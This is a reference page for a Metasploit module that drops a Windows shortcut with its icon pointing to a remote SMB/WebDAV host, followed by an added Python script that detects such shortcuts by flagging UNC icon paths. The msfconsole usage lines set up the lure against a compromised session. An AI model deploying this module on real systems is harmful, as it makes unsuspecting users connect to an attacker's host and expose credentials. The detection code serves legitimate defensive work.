Windows Escalate SMB Icon LNK dropper
This module drops a shortcut (LNK file) whose icon reference points to a file on the specified remote host, causing SMB and WebDAV connections to be initiated by any user who views the shortcut.
Rank
- Normal
Authors
- Rob Fuller < mubix [at] hak5.org >
Similar Modules
- post/windows/escalate/bypassuac
- post/windows/escalate/getsystem
- post/windows/escalate/ms10_073_kbdlayout
- post/windows/escalate/ms10_092_schelevator
- post/windows/escalate/net_runtime_modify
- post/windows/escalate/screen_unlock
- post/windows/escalate/service_permissions
Usage Information
$ msfconsole
msf > use post/windows/escalate/droplnk
msf post(droplnk) > set LHOST [MY IP ADDRESS]
msf post(droplnk) > set SESSION [INTEGER]
Module Options
| Option | Description |
| --- | --- |
| ICONFILENAME | File name on LHOST's share (default: icon.png) |
| LHOST | Host listening for incoming SMB/WebDAV traffic |
| LNKFILENAME | Shortcut's filename (default: Words.lnk) |
| SESSION | The session to run this module on. |
| SHARENAME | Share name on LHOST (default: share1) |
| VERBOSE | Enable detailed status messages |
| WORKSPACE | Specify the workspace for this module |
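
Detection example (added here, not part of the module or of Metasploit): a defender can find shortcuts of the kind described above by parsing each .lnk file and flagging an icon location that is a UNC path. It assumes the icon reference is stored in the ICON_LOCATION string of the MS-SHLLINK format; the function names are illustrative.

```python
import re
import struct
import sys

# LinkFlags bits from the MS-SHLLINK ShellLinkHeader (offset 20).
# Assumption: the remote icon reference sits in the ICON_LOCATION string.
HAS_ID_LIST, HAS_LINK_INFO, IS_UNICODE = 0x01, 0x02, 0x80
STRING_FLAGS = [(0x04, "name"), (0x08, "relative_path"), (0x10, "working_dir"),
                (0x20, "arguments"), (0x40, "icon_location")]
# \\host\... but not the local device prefixes \\?\ and \\.\
UNC = re.compile(r"^\\\\[^\\?.][^\\]*\\")


def parse_lnk_strings(data):
    """Return the StringData fields of a shortcut as a dict."""
    if len(data) < 76 or struct.unpack_from("<I", data, 0)[0] != 0x4C:
        raise ValueError("not a shell link file")
    flags = struct.unpack_from("<I", data, 20)[0]
    pos = 76  # fixed header size
    if flags & HAS_ID_LIST:      # LinkTargetIDList: 2-byte size, then the list
        pos += 2 + struct.unpack_from("<H", data, pos)[0]
    if flags & HAS_LINK_INFO:    # LinkInfo: its 4-byte size includes itself
        pos += struct.unpack_from("<I", data, pos)[0]
    width, codec = (2, "utf-16-le") if flags & IS_UNICODE else (1, "cp1252")
    fields = {}
    for bit, name in STRING_FLAGS:  # present fields appear in this fixed order
        if flags & bit:
            count = struct.unpack_from("<H", data, pos)[0]  # in characters
            raw = data[pos + 2:pos + 2 + count * width]
            fields[name] = raw.decode(codec, "replace")
            pos += 2 + count * width
    return fields


def remote_icon(data):
    """Return the icon path if it is a UNC path, else None."""
    try:
        icon = parse_lnk_strings(data).get("icon_location", "")
    except (ValueError, struct.error):  # not a shortcut, or truncated
        return None
    return icon if UNC.match(icon) else None


if __name__ == "__main__":
    for path in sys.argv[1:]:  # e.g. .lnk files collected from shared folders
        with open(path, "rb") as fh:
            hit = remote_icon(fh.read())
        if hit:
            print(f"{path}: remote icon reference {hit}")
```

Icon paths stored in an ExtraData IconEnvironmentDataBlock are not covered by this check.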
